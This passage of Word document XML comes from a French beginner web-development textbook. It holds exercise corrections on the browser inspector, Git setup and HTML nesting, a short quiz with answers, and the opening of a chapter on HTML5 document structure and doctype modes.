        </w:rPr>
        <w:t>editor.formatOnSave</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> suffisent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Pour tester le formatage, écrivez une ligne très longue et mal indentée, enregistrez : le formateur la réorganise selon la règle configurée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une erreur typique consiste à fermer une balise dans le mauvais ordre : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;p&gt;&lt;strong&gt;texte&lt;/p&gt;&lt;/strong&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Le validateur signale l'imbrication incorrecte ; la correction consiste à fermer d'abord </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>strong</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, puis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 2.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le volet « Styles » affiche la police calculée (par exemple 32 px) et la règle correspondante avec son sélecteur et son fichier source.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La règle gagnante est celle qui apparaît en premier et n'est pas barrée. Les règles barrées sont écrasées par plus spécifiques ou plus tardives.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Après rechargement, la couleur d'origine revient : la modification n'a pas été enregistrée. C'est la démonstration du caractère temporaire de l'inspecteur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 2.3</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mkdir -p portfolio/{css,js,images} &amp;&amp; cd portfolio</w:t>
        <w:br/>
        <w:t>$ touch index.html css/style.css js/app.js</w:t>
        <w:br/>
        <w:t>$ printf "node_modules/\n.DS_Store\n*.log\n" &gt; .gitignore</w:t>
        <w:br/>
        <w:t>$ git init &amp;&amp; git add . &amp;&amp; git commit -m "Structure initiale du portfolio"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> montre ensuite les fichiers modifiés en rouge et ceux indexés en vert. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git diff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> affiche le détail des changements non indexés ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> les prépare ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git commit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> les enregistre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un commit doit décrire une intention : « Ajoute la page d'accueil », non « maj ». Cette discipline rend l'historique lisible et les retours arrière sûrs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 2.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Trois erreurs : la balise </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est fermée par une autre ouverture de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (le navigateur referme automatiquement, mais la structure devient ambiguë) ; les balises </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> s'entrecroisent ; le document n'a pas de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;!doctype html&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, ce qui déclenche le mode « quirks ».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Conséquences : la hiérarchie des titres est fausse, le style peut se propager de travers, et le mode quirks modifie le calcul des tailles et des marges, rendant la mise en page imprévisible.</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&lt;!doctype html&gt;</w:t>
        <w:br/>
        <w:t>&lt;html lang="fr"&gt;</w:t>
        <w:br/>
        <w:t>&lt;head&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;meta charset="utf-8"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;title&gt;Test&lt;/title&gt;</w:t>
        <w:br/>
        <w:t>&lt;/head&gt;</w:t>
        <w:br/>
        <w:t>&lt;body&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;h1&gt;Bienvenue&lt;/h1&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;p&gt;Texte &lt;strong&gt;important&lt;/strong&gt;&lt;/p&gt;</w:t>
        <w:br/>
        <w:t>&lt;/body&gt;</w:t>
        <w:br/>
        <w:t>&lt;/html&gt;</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Pourquoi faut-il éviter les espaces et les accents dans les noms de fichiers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Ils empêchent le navigateur d'ouvrir le fichier</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Ils doivent être encodés dans les URL et peuvent différer selon les systèmes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Ils rendent le HTML invalide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Ils empêchent Git de fonctionner</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 se passe-t-il lorsqu'on modifie une règle CSS dans l'inspecteur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La modification est enregistrée dans le fichier CSS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La modification est appliquée jusqu'au rechargement, puis perdue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La modification est enregistrée dans le cache du navigateur</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La modification est envoyée au serveur</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Quel réglage évite les différences d'indentation dans un projet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Activer la détection automatique de l'indentation</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Fixer une taille et un type d'indentation, et désactiver la détection</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Utiliser des tabulations uniquement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Formater manuellement chaque fichier</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À quoi sert le fichier .gitignore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À exclure des fichiers du suivi de version</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À empêcher Git de créer un dépôt</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À chiffrer les fichiers sensibles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À lister les contributeurs autorisés</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Quel panneau du navigateur permet de connaître le temps de réponse d'un serveur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Éléments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Console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Réseau</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Application</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Les caractères non ASCII sont encodés dans les URL ; selon le système de fichiers, le cas et la normalisation Unicode varient, ce qui produit des erreurs 404 difficiles à diagnostiquer.</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L'inspecteur agit sur une copie en mémoire de la feuille de style. Le rechargement réinitialise tout ; il faut reporter la valeur dans le fichier source.</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La détection automatique reproduit l'indentation existante, y compris ses incohérences. Fixer la règle et la partager est la seule approche stable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4. A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.gitignore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> indique à Git les motifs de fichiers à ne pas suivre : dépendances, journaux, secrets locaux. Il ne protège pas un fichier déjà commité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Le panneau Réseau affiche pour chaque requête le temps d'attente du serveur, le temps de téléchargement et la taille transférée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>3. La structure d'un document HTML5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Le squelette invisible d'une page : ce que le navigateur lit avant d'afficher le premier pixel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 45 · Niveau : Débutant · Prérequis : chapitre 2</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Écrire un document HTML5 complet et valide.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Comprendre le rôle de chaque métadonnée de l'en-tête.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Organiser les ressources externes sans bloquer le rendu.</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Structurer le corps du document avec les éléments sémantiques.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Contrôler l'encodage, la langue et l'aperçu social d'une page.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 Anatomie d'un document</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un fichier HTML est un texte brut. Le navigateur le lit de haut en bas, construit progressivement une représentation en mémoire — le DOM — puis applique les styles et peint l'écran. Tout ce qui précède le contenu visible décrit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>comment interpréter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ce contenu.</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DOM</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Document Object Model : représentation arborescente du document, manipulable par les styles et les scripts. Chaque balise devient un nœud, chaque attribut une propriété.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Le document HTML5 complet, avec sa structure sémantique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&lt;!doctype html&gt;</w:t>
        <w:br/>
        <w:t>&lt;html lang="fr"&gt;</w:t>
        <w:br/>
        <w:t>&lt;head&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;meta charset="utf-8"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;title&gt;Le titre de ma page&lt;/title&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;meta name="description" content="Résumé de la page en une phrase."&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;link rel="stylesheet" href="css/style.css"&gt;</w:t>
        <w:br/>
        <w:t>&lt;/head&gt;</w:t>
        <w:br/>
        <w:t>&lt;body&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;header&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;h1&gt;Le titre visible&lt;/h1&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/header&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;main&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;p&gt;Le contenu de la page.&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/main&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;footer&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;p&gt;© 2026 — Mon site&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/footer&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;script src="js/app.js" defer&gt;&lt;/script&gt;</w:t>
        <w:br/>
        <w:t>&lt;/body&gt;</w:t>
        <w:br/>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ce modèle contient déjà l'essentiel : déclaration de type, langue, encodage, adaptation mobile, titre, description, feuille de style, structure sémantique et script non bloquant. Nous détaillons chaque ligne dans ce chapitre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 Le doctype et le mode d'affichage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La première ligne n'est pas une balise : c'est une déclaration. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;!doctype html&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> indique au navigateur d'utiliser le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>mode standard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, celui qui respecte les spécifications. Son absence déclenche le mode « quirks », hérité des années 1990, où le calcul des tailles et des marges diffère.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.6 — Trois modes d'affichage et leurs effets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8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Déclaration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="196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Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="426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Conséquences</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;!doctype html&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1967"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4261"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Modèle de boîte conforme, comportements prévisibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Doctype HTML 4 long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="196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Presque standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="426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Quelques différences de rendu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucun doctype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1967"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
